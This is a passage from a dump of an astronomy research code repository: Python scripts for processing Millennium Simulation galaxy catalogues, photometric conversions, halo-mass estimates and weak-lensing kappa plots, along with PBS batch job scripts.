('cooling_radius' ,'f4' ), #0.0 $ , [Mpc/h] , the radius within which the cooling time scale is shorter than the dynamical timescale\n ('quasar_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which cold gas is accreted into the central black hole in the quasar mode.\n ('radio_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which hot gas is accreted into the central black hole in the radio mode.\n ('mag' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction not included ?)\n ('mag_bulge' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy bulge (magnification included, dust extinction not included ???)\n ('mag_dust' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction included ?)\n ('mass_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('rband_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('sfh_ibin' ,'i4' ), #0L $ , , Index of the higest star formation history bin currently in use.\n ('sfh_numbins' ,'i4' ), #0L $ , , Number of non-empty star formation history bins.\n ('distortion' ,'f4',(2,2)), #fltarr(4) $ , , (11, 12, 21, 22)-components of distortion matrix\n ('plane_number' ,'i4' ) #0L $ , , index of redshift slice (and lens plane) the galaxy is associated with\n ])\n\nfilter_number_for_c_johnson_U = 0\nfilter_number_for_c_johnson_B = 1\nfilter_number_for_c_johnson_V = 2\nfilter_number_for_c_johnson_rc = 3\nfilter_number_for_c_johnson_ic = 4\nfilter_number_for_vista_johnson_Z = 5\nfilter_number_for_vista_johnson_Y = 6\nfilter_number_for_vista_johnson_J = 7\nfilter_number_for_vista_johnson_H = 8\nfilter_number_for_c_johnson_K = 9\nfilter_number_for_vista_johnson_ks = 10\nfilter_number_for_i1_band = 11\nfilter_number_for_i2_band = 12\nfilter_number_for_i3_band = 13\nfilter_number_for_i4_band = 14\nfilter_number_for_u_band_trans = 15\nfilter_number_for_g_band_trans = 16\nfilter_number_for_r_band_trans = 17\nfilter_number_for_i_band_trans = 18\nfilter_number_for_z_band_trans = 19\nfilter_number_for_ACS_WFC_F435W = 20\nfilter_number_for_ACS_WFC_F475W = 21\nfilter_number_for_ACS_WFC_F606W = 22\nfilter_number_for_ACS_WFC_F625W = 23\nfilter_number_for_ACS_WFC_F775W = 24\nfilter_number_for_ACS_WFC_F814W = 25\nfilter_number_for_ACS_WFC_F850_LP = 26\nfilter_number_for_GALEX_FUV = 27\nfilter_number_for_GALEX_NUV = 28\nfilter_number_for_NIC_F110W = 29\nfilter_number_for_NIC_F160W3 = 30\nfilter_number_for_VIMOS_U = 31\nfilter_number_for_WFC3_IR_F105W = 32\nfilter_number_for_WFC3_IR_F125W = 33\nfilter_number_for_WFC3_IR_F160W = 34\nfilter_number_for_WFC3_UVIS_F225W = 35\nfilter_number_for_WFC3_UVIS_F275W = 36\nfilter_number_for_WFC3_UVIS_F336W = 37\nfilter_number_for_WFPC2_F300W = 38\nfilter_number_for_WFPC2_F450W = 39\n\nfor i in range(len(pl)):\n print int(pl[i])\n with open(\"/lfs08/rusucs/0408/GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane_%s_f.images\" % int(pl[i]), mode = 'rb') as file: # b is important -> binary\n lower_bound = np.fromfile(file, 'f8', 2)\n # print(lower_bound)\n upper_bound = np.fromfile(file, 'f8', 2)\n # print(upper_bound)\n plane_angle, = np.fromfile(file, 'f8', 1)\n # print(plane_angle)\n redshift, = np.fromfile(file, 'f8', 1)\n # print(redshift)\n n_galaxies, = np.fromfile(file, 'i8', 1)\n # print(n_galaxies)\n n_cells = np.fromfile(file, 'i4', 2)\n # print(n_cells)\n galaxy = np.fromfile(file, galaxy_struct, n_galaxies)\n x1 = galaxy['mag'][:,filter_number_for_u_band_trans]\n x2 = galaxy['mag'][:,filter_number_for_g_band_trans]\n x3 = galaxy['mag'][:,filter_number_for_r_band_trans]\n x4 = galaxy['mag'][:,filter_number_for_i_band_trans]\n x5 = galaxy['mag'][:,filter_number_for_z_band_trans]\n x6 = galaxy['mag'][:,filter_number_for_vista_johnson_Y]\n x0 = galaxy['redshift']\n x = np.c_[x0,x1,x2,x3,x4,x5,x6]\n j = 0\n ind = 0\n while (j < 1000) and (ind < len(x)):\n if x[ind][4]<23:\n out = np.c_[out,x[ind]]\n j += 1\n ind += 1\nnr = np.linspace(1,len(out[0]),len(out[0]))\nnp.savetxt(\"Henriques2014selectforBPZwithY.cat\",np.c_[nr,out[0],out[1],out[2],out[3],out[4],out[5],out[6]],fmt='%d %1.4f %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00', header = 'id z_s u u_err g g_err r r_err i i_err z z_err Y Y_err')\n" }, { "alpha_fraction": 0.5165716409683228, "alphanum_fraction": 0.6252672672271729, "avg_line_length": 60, "blob_id": "7dbf623716b35980b08266945e90d6da69844b0c", "content_id": "139de29017a1b7fad80f345ac8abcede9123882c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5612, "license_type": "no_license", "max_line_length": 239, "num_lines": 92, "path": "/python/plot_utilities/plotkappabar_others.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure the uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\ndata = np.genfromtxt('%smedstd.dat' % root,dtype=['S1000','f8','f8','f8','f8'])\n\nkappastat = np.array([])\nfor i in range(np.shape(data)[0]):\n if i == 0:\n kappastat = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n else:\n x = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n kappastat = np.c_[kappastat,x]\n\nkappastat = np.c_[ kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_45_gal_45_gamma_45_oneoverr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_45_gal_45_z_45_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_45_gal_45_zoverr_45_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_oneoverr_45_gal_45_gamma_45_mass_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_oneoverr_45_gal_45_gamma_45_z_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # 1/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_oneoverr_45_gal_45_mass_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_oneoverr_45_gal_45_z_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_zoverr_45_gal_45_gamma_45_mass_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_zoverr_45_gal_45_gamma_45_z_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_zoverr_45_gal_45_mass_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_zoverr_45_gal_45_z_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n kappastat.T[kappastat[0]=='fiducial_45_gal_120_gal_120_gamma_22.5_med_increments4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_120_gal_22.5_med_increments4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_120_gal_120_z_120_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_120_gal_120_zoverr_120_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_22.5_med_increments4_4_emptymsk.cat'][0][1:].astype(float)]#, SIS]\n\nlabels = ( '120galgamma1/r45gal1/r', # 1\n '120galgamma45galgamma1/r', # 2\n '120galgamma45galzSIS', # 3\n '120galgamma45galz/rSIS', # 4\n '120gal1/r45galgammamass', # 5\n '120gal1/r45galgammaz', # 6\n '120gal1/r45galmass', # 7\n '120gal1/r45galz', # 20\n '120galz/r45galgammamass', # 8\n '120galz/r45galgammaz', # 23\n '120galz/r45galmass', # 27\n '120galz/r45galz', #\n '45gal120galgamma', # 21\n '45gal120gal',\n '45galgamma120galzSIS', # 22\n '45galgamma120galz/rSIS',\n '45galz/r'\n)\n\nN = 17\nind = 2 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat[0])\nrects1 = ax.bar(ind + 2*width, col1, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.02,0.08])\nax.set_ylabel('median$_\\kappa$')\n#ax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(labels, fontsize=6, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol2 = (kappastat[1])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\nax.set_ylim([0,0.08])\nax.set_ylabel('$\\sigma_\\kappa$')\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels([])\n#ax.legend((rects1[0], rects2[0]), ('22.5 45: gal+1/r 120: gal+$\\gamma$+', '22.5 45: gal+1/r 120: gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.65, 1.4), fontsize=10)\n#ax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.3, 0.97), fontsize=10)\nplt.subplots_adjust(left=0.15, bottom=0.02, right=0.95, top=0.95, wspace=0.7, hspace=1.2)\nplt.savefig('%skappashistbar-others.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.634782612323761, "alphanum_fraction": 0.7188405990600586, "avg_line_length": 19.352941513061523, "blob_id": "cddb90ce41ce4d3bf1b61d38d8c6e47aa939133c", "content_id": "383ca7cce79f51c2655cecfbd8c9b047b9eaeec3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 345, "license_type": "no_license", "max_line_length": 124, "num_lines": 17, "path": "/python/scripts/NAOJ/batch_infersim6new.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n##PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Log6.out\n#PBS -e Log6.err\n#PBS -N 6\n#PBS -l mem=30gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython inferkappa_unbiasedwithshearJ1206withHE0435.py J1206 -1.0 -1.0 removegrouphandpicked fiducial 5 45 24 meds gal zoverr" }, { "alpha_fraction": 0.6275468468666077, "alphanum_fraction": 0.634881854057312, "avg_line_length": 29.461538314819336, "blob_id": "1b2bfbc9c1fde97c883276bfc4b397d311c1e160", "content_id": "eed6d720f6496852abbe5a23797b30b6550f6051", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1227, "license_type": "no_license", "max_line_length": 142, "num_lines": 39, "path": "/python/modeling_utilities/rejected.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code fixes the MCMC chains from Hostlens/Glafic by accounting for the trace of the rejected points. It needs two inputs:\r\n# - the mcmc file exported by hostlens/glafic\r\n# - a copy of the execution screen which displays the mcmc reject/accepted points; edit it to remove the unnecessary lines (header and footer)\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\r\nprefix = \"ilens_out_mcmc\"\r\nfilescreen = prefix + \"screen.dat\"\r\nfilemcmc = prefix + \".dat\"\r\nfileout = prefix + \"withrejected.dat\"\r\n\r\nwith open(filescreen, 'r') as f:\r\n screen = f.readlines()\r\n f.close()\r\n\r\nwith open(filemcmc, 'r') as f:\r\n mcmc = f.readlines()\r\n f.close()\r\n\r\nout = [] # will contain the complete chains\r\ni = 0 # index in mcmc file\r\ninit = 0 # whether or not it found the first successful point\r\nfor j in range(np.shape(screen)[0]): # index in screen file\r\n if init == 1 and \"[rejected]\" in screen[j]:\r\n out.append(mcmc[i])\r\n if init == 1 and \"[rejected]\" not in screen[j]:\r\n i += 1\r\n out.append(mcmc[i])\r\n if init == 0 and \"[rejected]\" not in screen[j]:\r\n init = 1\r\n out.append(mcmc[i])\r\n i += 1\r\n\r\nwith open(fileout, 'w') as f:\r\n f.writelines(out)\r\n f.close()\r\n" }, { "alpha_fraction": 0.5312056541442871, "alphanum_fraction": 0.5794326066970825, "avg_line_length": 46, "blob_id": "04a428955b68ca04ae1807a0e584dff3a88ef70d", "content_id": "431bb1587b9404cb030e8fc28f44dcc39c02ff5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1410, "license_type": "no_license", "max_line_length": 132, "num_lines": 30, "path": "/python/catalogue_utilities/extractMilleniumPG1115.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code samples from a single-band the Millenium Simulation (MS) photometry\n\nimport numpy as np\n\nrootin = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/\"\nrootout = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/PG1115/\"\n\nid = 0\nzspec = 5\nposx = 6\nposy = 7\nr = 14\n\nrRstd = 0.07\nhead = \"GalID \\t z_spec \\t pos_0 \\t pos_1 \\t mag_SDSS_r\"\nfor i in range(8):\n for j in range(8):\n for k in range(4):\n for l in range(4):\n print i,j,k,l\n filein = rootin+'GGL_los_8_%s_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt' %(i,j,k,l)\n fileout = rootout+'GGL_los_8_%s_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_originalr.images.txt' %(i,j,k,l)\n data = np.loadtxt(filein,usecols=[id,zspec,posx,posy,r],comments='GalID')\n data = data[data[:,4]<=24]\n np.savetxt(fileout,data,header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.2f')\n fileout = rootout+'GGL_los_8_%s_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_sampledr.images.txt' %(i,j,k,l)\n data = np.loadtxt(filein,usecols=[id,zspec,posx,posy,r],comments='GalID')\n data[:,4] = np.random.normal(data[:,4], 0.07)\n data = data[data[:,4]<=24]\n np.savetxt(fileout,data,header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.2f')\n" }, { "alpha_fraction": 0.5477481484413147, "alphanum_fraction": 0.6311509609222412, "avg_line_length": 35.060150146484375, "blob_id": "be37ca28a9cb9d162dfbf6464dfbaaa0431d4eba", "content_id": "cf25c2b2c8fba17e67a9fd8a83b7e90532a2a12d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4796, "license_type": "no_license", "max_line_length": 274, "num_lines": 133, "path": "/python/catalogue_utilities/finalprepMilleniumNAOJ_griK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code uses the output from MstarMilleniumSLAC_WFI2033.py, photozMillenium_WFI2033.py and extractMillenium.py in order to prepare a final file from the Millennium Simulation to send to the NAOJ server. It also computes halo masses following Behroozi et al 2010\n# Run as python finalprepMilleniumNAOJ_griK.py GGL_los_8_4_6_2_1_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images.txt\n\nimport numpy as np\nimport sys\n\nfileextract = str(sys.argv[1])\n\n#fileextract = \"GGL_los_8_4_6_2_1_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images.txt\"\n#fileforlephare = \"GGL_los_8_1_2_3_2_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_WFI2033.images_forlephare.txt\"\n#filemstar = \"GGL_los_8_4_5_3_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_WFI2033.images_forlephare_mstar.txt\"\nfileforlephare = fileextract[:-27] + \"griK_WFI2033.images_forlephare.txt\"\nfilemstar = fileextract[:-27] + \"griK_WFI2033.images_forlephare_mstar.txt\"\nfileout = fileextract[:-27] + \"griK_WFI2033.images_forNAOJ.txt\"\n\nid = 0\nzspec = 1\nposx = 2\nposy = 3\nmhalo = 4\nmstar = 5\niorig = 6\ni_o = 13\n\nphotoz = 18\nmstar_specz = 1\nmstar_photoz = 2\ndataextract = np.loadtxt(fileextract,usecols=[id,zspec,posx,posy,mhalo,mstar,iorig,i_o],unpack=True)\ndataforlephare = np.loadtxt(fileforlephare,usecols=[photoz],unpack=True)\ndatamstar = np.loadtxt(filemstar,usecols=[mstar_specz,mstar_photoz],unpack=True)\n\nid = 0\nzspec = 1\nposx = 2\nposy = 3\nmhalo = 4\nmstar = 5\niorig = 6\ni_o = 7\nmstar_specz = 0\nmstar_photoz = 1\n\n# Behroozi et al 2010 parameters for z < 1:\nM10_ = 12.35\nM1a_ = 0.28\nMs00_ = 10.72\nMs0a_ = 0.55\nb0_ = 0.44\nba_ = 0.18\nd0_ = 0.57\nda_ = 0.17\ng0_ = 1.56\nga_ = 2.51\n# z >= 1:\nM10 = 12.27\nM1a = -0.84\nMs00 = 11.09\nMs0a = 0.56\nb0 = 0.65\nba = 0.31\nd0 = 0.56\nda = -0.12\ng0 = 1.12\nga = -0.53\n\ndatahalo = np.zeros([len(dataextract[id]),2])\n\nif \"JHK\" in fileextract:\n a = 1 / (1 + dataextract[zspec][dataextract[zspec] <= 1])\n logM1a = M10_ + M1a_ * (a - 1)\n logMs0a = Ms00_ + Ms0a_ * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = b0_ + ba_ * (a - 1)\n d = d0_ + da_ * (a - 1)\n g = g0_ + ga_ * (a - 1)\n datahalo[:,0][dataextract[zspec] <= 1] = logM1a + b * (datamstar[mstar_specz][dataextract[zspec] <= 1] - logMs0a) + ((10 ** datamstar[mstar_specz][dataextract[zspec] <= 1]/notlogMs0a)**d)/(1+(10 ** datamstar[mstar_specz][dataextract[zspec] <= 1]/notlogMs0a)**(-g)) - 1/2\n del logM1a\n del logMs0a\n del notlogMs0a\n del b\n del d\n del g\n\n a = 1 / (1 + dataextract[zspec][dataextract[zspec] > 1])\n logM1a = M10 + M1a * (a-1)\n logMs0a = Ms00 + Ms0a * (a-1)\n notlogMs0a = 10 ** logMs0a\n b = b0 + ba * (a-1)\n d = d0 + da * (a-1)\n g = g0 + ga * (a-1)\n datahalo[:,0][dataextract[zspec] > 1] = logM1a + b * (datamstar[mstar_specz][dataextract[zspec] > 1] - logMs0a) + ((10 ** datamstar[mstar_specz][dataextract[zspec] > 1]/notlogMs0a)**d)/(1+(10 ** datamstar[mstar_specz][dataextract[zspec] > 1]/notlogMs0a)**(-g)) - 1/2\n del logM1a\n del logMs0a\n del notlogMs0a\n del b\n del d\n del g\n\n a = 1 / (1 + dataforlephare[dataforlephare <= 1])\n logM1a = M10_ + M1a_ * (a - 1)\n logMs0a = Ms00_ + Ms0a_ * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = b0_ + ba_ * (a - 1)\n d = d0_ + da_ * (a - 1)\n g = g0_ + ga_ * (a - 1)\n datahalo[:,1][dataforlephare <= 1] = logM1a + b * (datamstar[mstar_photoz][dataforlephare <= 1] - logMs0a) + ((10 ** datamstar[mstar_photoz][dataforlephare <= 1]/notlogMs0a)**d)/(1+(10 ** datamstar[mstar_photoz][dataforlephare <= 1]/notlogMs0a)**(-g)) - 1/2\n del logM1a\n del logMs0a\n del notlogMs0a\n del b\n del d\n del g\n \n a = 1 / (1 + dataforlephare[dataforlephare > 1])\n logM1a = M10 + M1a * (a-1)\n logMs0a = Ms00 + Ms0a * (a-1)\n notlogMs0a = 10 ** logMs0a\n b = b0 + ba * (a-1)\n d = d0 + da * (a-1)\n g = g0 + ga * (a-1)\n datahalo[:,1][dataforlephare > 1] = logM1a + b * (datamstar[mstar_photoz][dataforlephare > 1] - logMs0a) + ((10 ** datamstar[mstar_photoz][dataforlephare > 1]/notlogMs0a)**d)/(1+(10 ** datamstar[mstar_photoz][dataforlephare > 1]/notlogMs0a)**(-g)) - 1/2\n del logM1a\n del logMs0a\n del notlogMs0a\n del b\n del d\n del g\n\ndataout = np.c_[dataextract[id],dataextract[zspec],dataextract[posx],dataextract[posy],dataextract[mhalo],dataextract[mstar],dataextract[iorig],dataextract[i_o],dataforlephare,datamstar[mstar_specz],datamstar[mstar_photoz],datahalo[:,0],datahalo[:,1]]\nhead = \"GalID \\t z_spec \\t pos_0 \\t pos_1 \\t M_Halo \\t M_Stellar \\t mag_SDSS_iorig \\t mag_SDSS_i \\t photoz \\t mstar_specz \\t mstar_photoz \\t mhalo_specz \\t mhalo_photoz\"\nnp.savetxt(fileout,dataout,header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.3e \\t %.3e \\t %.2f \\t %.2f \\t %.2f \\t %.3f \\t %.3f \\t %.3f \\t %.3f')\n\nprint str(sys.argv[1]) + ' Done!'\n" }, { "alpha_fraction": 0.4378458857536316, "alphanum_fraction": 0.545976996421814, "avg_line_length": 49.51612854003906, "blob_id": "23eb5e68a30caa72311b525fc7be3cd6297b2af0", "content_id": "19df5ec6b134b9b6184e7c573f7b6c8fb7dd0a01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4698, "license_type": "no_license", "max_line_length": 229, "num_lines": 93, "path": "/python/catalogue_utilities/converttoeazy.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to convert a photometric catalogue in the format expected by BPZ to the format expected by EaZy. The code handles non-detections (not yet non-exposures).\n##########################\n\nimport numpy as np\nimport sys\n\nfile = str(sys.argv[1])\n#file = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.cat\"\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.cat\"\n\n# zeropoint corrections suggested by BPZ:\nif 'detectin_iunconv' in file:\n g_corr = -0.077\n r_corr = -0.004\n i_corr = 0.000\n K_corr = -0.022\nif 'detectin_iconv' in file:\n g_corr = -0.061\n r_corr = -0.007\n i_corr = 0.000\n K_corr = -0.046\n\n# conversion from Vega to AB; assuming that the input mags are in Vega\nK_corr += 1.83\n\nif 'detectin_iunconv' in file:\n id = 0\n g = 22\n g_err = 23\n r = 24\n r_err = 25\n i = 26\n i_err = 27\n K = 28\n K_err = 29\nif 'detectin_iconv' in file:\n id = 0\n g = 20\n g_err = 21\n r = 22\n r_err = 23\n i = 24\n i_err = 25\n K = 26\n K_err = 27\n\ndata = np.loadtxt(file,unpack=True)\n\n# apply the corrections\ndata[g][np.abs(data[g]) != 99.0] += g_corr\ndata[r][np.abs(data[r]) != 99.0] += r_corr\ndata[i][np.abs(data[i]) != 99.0] += i_corr\ndata[K][np.abs(data[K]) != 99.0] += K_corr\n\n# make non-detection fluxes -99\ndata[g][np.abs(data[g]) == 99.0] = -99\ndata[r][np.abs(data[r]) == 99.0] = -99\ndata[i][np.abs(data[i]) == 99.0] = -99\ndata[K][np.abs(data[K]) == 99.0] = -99\n\n# for the non-detections, replace error bars with the flux corresponsing to the corrected limiting mag\ndata[g_err][np.abs(data[g]) == 99.0] = 3631000000 * 10**(-(data[g_err][np.abs(data[g]) == 99.0] + g_corr)/2.5)\ndata[r_err][np.abs(data[r]) == 99.0] = 3631000000 * 10**(-(data[r_err][np.abs(data[r]) == 99.0] + r_corr)/2.5)\ndata[i_err][np.abs(data[i]) == 99.0] = 3631000000 * 10**(-(data[i_err][np.abs(data[i]) == 99.0] + i_corr)/2.5)\ndata[K_err][np.abs(data[K]) == 99.0] = 3631000000 * 10**(-(data[K_err][np.abs(data[K]) == 99.0] + K_corr)/2.5)\n\n# make minimum delta mag 0.01\ndata[g_err][(np.abs(data[g]) != 99.0) & (np.abs(data[g_err]) == 0.00)] = 0.01\ndata[r_err][(np.abs(data[r]) != 99.0) & (np.abs(data[r_err]) == 0.00)] = 0.01\ndata[i_err][(np.abs(data[i]) != 99.0) & (np.abs(data[i_err]) == 0.00)] = 0.01\ndata[K_err][(np.abs(data[K]) != 99.0) & (np.abs(data[K_err]) == 0.00)] = 0.01\n\n# a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and Ideally I would fix the errors one by one through closer examination. Here I just replace their errors with 1 mag\ndata[g_err][np.abs(data[g_err]) == 99.00] = 1.00\ndata[r_err][np.abs(data[r_err]) == 99.00] = 1.00\ndata[i_err][np.abs(data[i_err]) == 99.00] = 1.00\ndata[K_err][np.abs(data[K_err]) == 99.00] = 1.00\n\n# convert AB -> Jky\ndata[g_err][np.abs(data[g]) != 99.0] = 3631000000 * (10**(-(data[g][np.abs(data[g]) != 99.0] - data[g_err][np.abs(data[g]) != 99.0])/2.5) - 10**(-(data[g][np.abs(data[g]) != 99.0] + data[g_err][np.abs(data[g]) != 99.0])/2.5)) / 2\ndata[g][np.abs(data[g]) != 99.0] = 3631000000 * 10**(-data[g][np.abs(data[g]) != 99.0]/2.5)\ndata[r_err][np.abs(data[r]) != 99.0] = 3631000000 * (10**(-(data[r][np.abs(data[r]) != 99.0] - data[r_err][np.abs(data[r]) != 99.0])/2.5) - 10**(-(data[r][np.abs(data[r]) != 99.0] + data[r_err][np.abs(data[r]) != 99.0])/2.5)) / 2\ndata[r][np.abs(data[r]) != 99.0] = 3631000000 * 10**(-data[r][np.abs(data[r]) != 99.0]/2.5)\ndata[i_err][np.abs(data[i]) != 99.0] = 3631000000 * (10**(-(data[i][np.abs(data[i]) != 99.0] - data[i_err][np.abs(data[i]) != 99.0])/2.5) - 10**(-(data[i][np.abs(data[i]) != 99.0] + data[i_err][np.abs(data[i]) != 99.0])/2.5)) / 2\ndata[i][np.abs(data[i]) != 99.0] = 3631000000 * 10**(-data[i][np.abs(data[i]) != 99.0]/2.5)\ndata[K_err][np.abs(data[K]) != 99.0] = 3631000000 * (10**(-(data[K][np.abs(data[K]) != 99.0] - data[K_err][np.abs(data[K]) != 99.0])/2.5) - 10**(-(data[K][np.abs(data[K]) != 99.0] + data[K_err][np.abs(data[K]) != 99.0])/2.5)) / 2\ndata[K][np.abs(data[K]) != 99.0] = 3631000000 * 10**(-data[K][np.abs(data[K]) != 99.0]/2.5)\n \nfileout = file[:-12] + \"_forEazy.cat\"\nstr = \"id F323 E323 F324 E324 F325 E325 F326 E326\"\ndataout = np.c_[data[id],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[K],data[K_err]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f')\n" }, { "alpha_fraction": 0.6697080135345459, "alphanum_fraction": 0.7682482004165649, "avg_line_length": 26.399999618530273, "blob_id": "ddc47f8e86dbf800e0e905b7db851e3a47665de1", "content_id": "1736251bfe327e11daf1c08251927a3a940b6f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 548, "license_type": "no_license", "max_line_length": 78, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim6.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log6s.out\n#PBS -e Log6s.err\n#PBS -N 6s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass2\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass2\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass2\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass2\n" }, { "alpha_fraction": 0.5899524688720703, "alphanum_fraction": 0.6157501935958862, 